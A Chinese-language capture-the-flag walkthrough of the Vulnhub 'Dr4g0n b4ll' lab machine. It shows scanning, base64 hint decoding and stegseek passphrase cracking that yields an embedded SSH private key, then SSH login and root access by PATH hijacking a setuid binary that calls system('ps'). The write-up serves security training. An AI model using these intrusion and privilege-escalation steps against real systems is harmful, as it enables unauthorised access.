Dr4g0n b4ll
识别目标主机IP地址
本靶机存在无法从virutualbox自动获取IP地址的问题,参照本人的相关文章首先解决该问题。
─(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:2b:cc:72 1 60 PCS Systemtechnik GmbH
192.168.56.189 08:00:27:a0:27:82 1 60 PCS Systemtechnik GmbH
利用Kali linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.189
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.189 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-18 06:39 EST
Nmap scan report for bogon (192.168.56.189)
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b5:77:4c:88:d7:27:54:1c:56:1d:48:d9:a4:1e:28:91 (RSA)
| 256 c6:a8:c8:9e:ed:0d:67:1f:ae:ad:6b:d5:dd:f1:57:a1 (ECDSA)
|_ 256 fa:a9:b0:e3:06:2b:92:63:ba:11:2f:94:d6:31:90:b2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: DRAGON BALL | Aj's
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A0:27:82 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.31 seconds
根据NMAP扫描结果,目标主机有2个开放端口:22(SSH服务)、80(HTTP服务)
Get Access
浏览器访问80端口,返回页面的源代码有以下注释:
<! VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09 >
似乎是多层的base64编码:
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ echo "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" |base64 -d
UkZKQlIwOU9JRUpCVEV3PQ==
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ echo "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" |base64 -d |base64 -d
RFJBR09OIEJBTEw=
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ echo "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" |base64 -d |base64 -d | base64 -d
DRAGON BALL
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$
好像没啥用,先放一边,看一下有无目录可利用。
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ curl http://192.168.56.189/robots.txt
eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI=
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ curl http://192.168.56.189/robots.txt | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 33 100 33 0 0 9428 0 --:--:-- --:--:-- --:--:-- 11000
you find the hidden dir
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ echo "eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI=" | base64 -d
you find the hidden dir
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$
Hidden是不是前面有.,
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ wfuzz -c -u http://192.168.56.189/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 31
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.189/.FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
页面源代码解码出来的Dragon Ball会不是是目录?(哎呀,原来目录是可以有空格,所以一直没敢想DRAGON BALL是个目录)
http://192.168.56.189/DRAGON%20BALL/
└─$ curl http://192.168.56.189/DRAGON%20BALL/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /DRAGON BALL</title>
</head>
<body>
<h1>Index of /DRAGON BALL</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="Vulnhub/">Vulnhub/</a></td><td align="right">2021-01-05 07:15 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="secret.txt">secret.txt</a></td><td align="right">2021-01-05 02:51 </td><td align="right">183 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.189 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ curl http://192.168.56.189/DRAGON%20BALL/secret.txt
/facebook.com
/youtube.com
/google.com
/vanakkam nanba
/customer
/customers
/taxonomy
/username
/passwd
/yesterday
/yshop
/zboard
/zeus
/aj.html
/zoom.html
/zero.html
/welcome.html
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ wget http://192.168.56.189/DRAGON%20BALL/Vulnhub/aj.jpg
--2022-11-18 07:48:36-- http://192.168.56.189/DRAGON%20BALL/Vulnhub/aj.jpg
Connecting to 192.168.56.189:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75168 (73K) [image/jpeg]
Saving to: ‘aj.jpg’
aj.jpg 100%[=================================================================================================================================>] 73.41K --.-KB/s in 0s
2022-11-18 07:48:36 (519 MB/s) - ‘aj.jpg’ saved [75168/75168]
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ ls
aj.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ steghide extract -sf aj.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ stegseek aj.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "love"
[i] Original filename: "id_rsa".
[i] Extracting to "aj.jpg.out".
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ ls
aj.jpg aj.jpg.out nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ cat aj.jpg.out
-----BEGIN OPENSSH PRIVATE KEY-----
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
Bd8180GtBAAaGtiwAAAAlrYWxpQGthbGk=
-----END OPENSSH PRIVATE KEY-----
这是一个私钥,但是用户名是什么呢
还有secret.txt这里面的内容是目录还是什么?访问这些目录又返回不存在
http://192.168.56.189/DRAGON%20BALL/Vulnhub/login.html
返回一个登录框,并有"Welcome xmen"
因此猜测用户名为xmen, 然后利用前面的私钥登录SSH
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ chmod 400 aj.jpg.out
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ ssh -i aj.jpg.out [email protected]
Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 5 07:09:06 2021 from 192.168.43.111
xmen@debian:~$ id
uid=1000(xmen) gid=1000(xmen) groups=1000(xmen),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
xmen@debian:~$ cat local.txt
your falg :192fb6275698b5ad9868c7afb62fd555xmen@debian:~$
xmen@debian:~$
得到用户flag.
提权
xmen@debian:/home$ cd xmen
xmen@debian:~$ ls -alh
total 36K
drwxr-xr-x 4 xmen xmen 4.0K Jan 5 2021 .
drwxr-xr-x 3 root root 4.0K Jan 4 2021 ..
-rw------- 1 xmen xmen 543 Jan 5 2021 .bash_history
-rw-r--r-- 1 xmen xmen 220 Jan 3 2021 .bash_logout
-rw-r--r-- 1 xmen xmen 3.5K Jan 3 2021 .bashrc
-rw-r--r-- 1 xmen xmen 43 Jan 2 2021 local.txt
-rw-r--r-- 1 xmen xmen 807 Jan 3 2021 .profile
drwxr-xr-x 2 root root 4.0K Jan 4 2021 script
drwx------ 2 xmen xmen 4.0K Jan 4 2021 .ssh
xmen@debian:~$ cd script
xmen@debian:~/script$ ls
demo.c shell
xmen@debian:~/script$ cat demo.c
#include<unistd.h>
void main()
{ setuid(0);
setgid(0);
system("ps");
}
xmen@debian:~/script$ ls
demo.c shell
xmen@debian:~/script$ strings shell
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
demo.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
/shell可以拿到root权限,而通过分析/shell的代码,可以知道它就是读取demo.c的文件,所以是否可以重新生成一个同名的demo.c,进行提权
但是查看script目录,xmen用户不具备写入文件的权限,在tmp目录生成一个内容为 /bin/bash 的ps文件,并将tmp目录添加到环境变量中
xmen@debian:/tmp$ echo "/bin/bash" > ps
xmen@debian:/tmp$ chmod 777 ps
xmen@debian:~/script$ export PATH="/tmp:$PATH"
xmen@debian:~/script$ cat $PATH
cat: '/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games': No such file or directory
xmen@debian:~/script$ more $PATH
more: stat of /tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games failed: No such file or directory
xmen@debian:~/script$ ./shell
root@debian:~/script# cd /root
root@debian:/root# ls -ahl
total 32K
drwx------ 4 root root 4.0K Jan 5 2021 .
drwxr-xr-x 18 root root 4.0K Jan 3 2021 ..
-rw------- 1 root root 2.3K Jan 5 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Jan 3 2021 .local
-rw------- 1 root root 0 Jan 3 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 509 Jan 5 2021 proof.txt
drwx------ 2 root root 4.0K Jan 4 2021 .ssh
root@debian:/root# cat proof.txt
_____ __________
/ \\______ \ ___ ___ _____ ____ ____
/ \ / \| _/ \ \/ // \_/ __ \ / \
/ Y \ | \ > <| Y Y \ ___/| | \
\____|__ /____|_ /__________/__/\_ \__|_| /\___ >___| /
\/ \/_____/_____/ \/ \/ \/ \/
join channel: https://t.me/joinchat/St01KnXzcGeWMKSC
your flag: 031f7d2d89b9dd2da3396a0d7b7fb3e2
root@debian:/root#
成功拿到root flag。 提权的关键在于理解demo.c执行了system('ps'),而且不是绝对路径,这样通过在/tmp目录下生成ps文件(这个假的ps其实是/bin/bash),通过这种方式实现提权。
标签:__,b4ll,--,kali,Dr4g0n,xmen,Vulnhub,root From: https://www.cnblogs.com/jason-huawen/p/16904937.html